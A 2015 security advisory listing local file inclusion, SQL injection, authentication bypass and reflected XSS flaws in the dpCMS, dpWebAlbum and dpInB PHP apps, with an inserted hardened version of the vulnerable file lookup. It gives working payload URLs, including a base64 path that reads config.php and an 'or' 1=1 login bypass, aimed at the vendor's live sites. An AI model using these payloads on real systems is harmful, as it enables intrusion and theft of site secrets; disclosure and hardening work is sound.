
dpCMS/dpWebAlbum/dpInB - Multiple Vulnerabilities

Author: KnocKout, Published: 30-05-2015
###################################################################
[+] Author : KnocKout
[~] E-Mail : knockout@e-mail.com.tr
[~] Twitter: http://twitter.com/h4SEC
[~] HomePage : http://h4x0resec.blogspot.com
###################################################################
Demo (Official): http://www.daniepaul.com
Script: https://github.com/daniepaul/dpwebalbum/tree/master/source
----------------------------------------------------------------
# dpWebAlbum -> Local File Inclusion Vulnerability
( https://github.com/daniepaul/dpwebalbum/tree/master/source )
*******************
Vulnerable lines in 'albumview.php':
<?php
// The id parameter is base64-decoded and used in the path without validation
$id = base64_decode($_GET['id']);
$file = "albumcovers/".$id;
if (file_exists($file)) readfile($file);
?>

*****************
Info:
The local file path must be base64-encoded and passed in the id parameter. The response then contains the source code of that file.

Payload : http://www.daniepaul.com/albumview.php?file&id=Li4vY29uZmlnLnBocA==
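
Hardened form of the lookup above, as an added example (not part of the original advisory and not the project's own code). It assumes covers are stored directly inside albumcovers/ as jpg, png or gif files; the function name resolve_cover is hypothetical.

```php
<?php
// Added example: confines the albumview.php lookup to the albumcovers directory.
// Assumption: cover files sit directly in ./albumcovers and are jpg/jpeg/png/gif.

function resolve_cover(string $baseDir, string $encodedId): ?string
{
    // Strict mode rejects input with characters outside the base64 alphabet.
    $name = base64_decode($encodedId, true);
    if ($name === false || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }

    // Accept a bare file name only: no directory separators, no leading dot,
    // and an image extension. A decoded value such as "../config.php" fails here.
    if (!preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9._-]*\.(?:jpe?g|png|gif)\z/i', $name)) {
        return null;
    }

    // Canonicalise both paths (resolves symlinks and dot segments) and require
    // the result to remain inside the base directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// A non-string id (for example id[]=x) is treated as invalid.
$raw  = $_GET['id'] ?? '';
$path = is_string($raw) ? resolve_cover(__DIR__ . '/albumcovers', $raw) : null;

// Take the content type from the file's bytes, not from its name.
$mime = $path !== null ? mime_content_type($path) : false;
if (!in_array($mime, ['image/jpeg', 'image/png', 'image/gif'], true)) {
    http_response_code(404);
    exit;
}

header('Content-Type: ' . $mime);
header('X-Content-Type-Options: nosniff');
readfile($path);
```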

---------------------------------------------------------------
# dpWebAlbum -> Remote SQL Injection
http://www.daniepaul.com/gallery.php?albummonth=12-2013 | R.C.E
----------------------------------------------------------
# dpCMS -> Admin Panel Auth Bypass
http://www.daniepaul.com/admin.php
Payload: 'or' 1=1
-----------------------------------------------------
# dpCMS -> Reflected XSS
http://www.daniepaul.com/admin.php?successmsg=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
-----------------------------------------------------

dpInB - Inventory and Billing System - Auth Bypass Vulnerability
Official: http://www.daniepaul.com/work/
DEMO : http://www.inb.daniepaul.com/
Payload: 'or' 1=1

########################################
